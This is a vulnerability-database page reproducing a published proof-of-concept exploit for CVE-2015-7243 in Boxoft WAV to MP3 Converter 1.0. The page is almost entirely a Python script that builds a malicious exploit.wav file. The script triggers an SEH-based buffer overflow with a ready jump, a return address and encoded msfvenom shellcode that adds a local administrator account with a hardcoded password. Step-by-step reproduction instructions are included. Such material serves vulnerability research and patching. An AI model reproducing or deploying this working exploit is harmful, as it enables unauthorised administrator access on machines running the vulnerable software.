Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2015-7243

Publish Date: 01 Jun 2016

Source

                							

                # Exploit Title: Boxoft WAV to MP3 Converter - SEH Based Buffer Overflow Exploit
# Date: 31/5/2016
# Exploit Author: Mandar
# Vendor Homepage: http://www.boxoft.com/wav-to-mp3/
# Software Link: http://www.boxoft.com/wav-to-mp3/setup(free-wav-to-mp3).exe
# Version: Boxoft WAV to MP3 Converter v1.0
# Tested on: Windows XP SP3, Windows 7 SP1 (64 bit), Windows 8.1, Windows 10 (64 bit)
# CVE : CVE-2015-7243
# Reference : https://www.exploit-db.com/exploits/38035/
# Category: Local Exploit

# Steps to reproduce:
# - Run the Boxoft WAV to MP3 Converter and select batch convert mode and hit next
# - Add exploit.wav file (generated by the PoC) and hit the convert to mp3 option
# - User "Hack" (pass-Hack@123) will be added to the local administrative group. 

#!/usr/bin/python

import sys, struct
file="exploit.wav"

junk = "\x41" * 4132 #offset to Next SEH
endofbuff = "\x42" * 5300 #junk
nseh =  "\xeb\x06\x90\x90" # hop over SEH
seh =  "\xd3\x24\x40\x00" # pop ecx  pop ebp ret (C:\Program Files (x86)\Boxoft Wav to MP3 (freeware)\wavtomp3.exe)

#msfvenom -a x86 --platform windows -p windows/adduser USER=hack PASS=Hack@123 -e x86/shikata_ga_nai -b "\x00" EXITFUNC=process -f python

buf =  ""
buf += "\xdb\xc0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x43\xb8\x27"
buf += "\x27\x79\xee\x31\x47\x19\x03\x47\x19\x83\xc7\x04\xc5"
buf += "\xd2\x85\x06\x8b\x1d\x76\xd7\xeb\x94\x93\xe6\x2b\xc2"
buf += "\xd0\x59\x9b\x80\xb5\x55\x50\xc4\x2d\xed\x14\xc1\x42"
buf += "\x46\x92\x37\x6c\x57\x8e\x04\xef\xdb\xcc\x58\xcf\xe2"
buf += "\x1f\xad\x0e\x22\x7d\x5c\x42\xfb\x0a\xf3\x73\x88\x46"
buf += "\xc8\xf8\xc2\x47\x48\x1c\x92\x66\x79\xb3\xa8\x31\x59"
buf += "\x35\x7c\x4a\xd0\x2d\x61\x76\xaa\xc6\x51\x0d\x2d\x0f"
buf += "\xa8\xee\x82\x6e\x04\x1d\xda\xb7\xa3\xfd\xa9\xc1\xd7"
buf += "\x80\xa9\x15\xa5\x5e\x3f\x8e\x0d\x15\xe7\x6a\xaf\xfa"
buf += "\x7e\xf8\xa3\xb7\xf5\xa6\xa7\x46\xd9\xdc\xdc\xc3\xdc"
buf += "\x32\x55\x97\xfa\x96\x3d\x4c\x62\x8e\x9b\x23\x9b\xd0"
buf += "\x43\x9c\x39\x9a\x6e\xc9\x33\xc1\xe4\x0c\xc1\x7f\x4a"
buf += "\x0e\xd9\x7f\xfb\x66\xe8\xf4\x94\xf1\xf5\xde\xd0\x0d"
buf += "\xbc\x43\x70\x85\x19\x16\xc0\xc8\x99\xcc\x07\xf4\x19"
buf += "\xe5\xf7\x03\x01\x8c\xf2\x48\x85\x7c\x8f\xc1\x60\x83"
buf += "\x3c\xe2\xa0\xe0\xaf\x78\x65\x82\x57\xe5\x59\x63\xcb"
buf += "\xc5\xf7\x1e\x7f\x25\x7d\x92\x1a\x57\x5d\x3c\x84\xf4"
buf += "\xf6\x9c\x0e\x9b\x6b\xb6\xce\x6a\x5e\x7b\xef\xa3\xdf"
buf += "\x3f\xab\x9b\xf9\x99\x13\xb5\x60\x92\x73\x25\x04\x39"
buf += "\x15\xd9\xbd\xcf\xba\x54\x32\x10\x04\xf2\xdf\x39\xe8"
buf += "\x93\x6c\xce\x86\x02\xe7\x41\x15\xb7\x27\xf6\xb8\x54"
buf += "\x43\x26\x14\xdb\xd7\x62\x6a"

nop = "\x90" * 10
payload = junk + nseh + seh + nop + buf + endofbuff

writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Boxoft Wav To MP3 Converter 1.0 Buffer Overflow

Vulmon Search

About

Products

Connect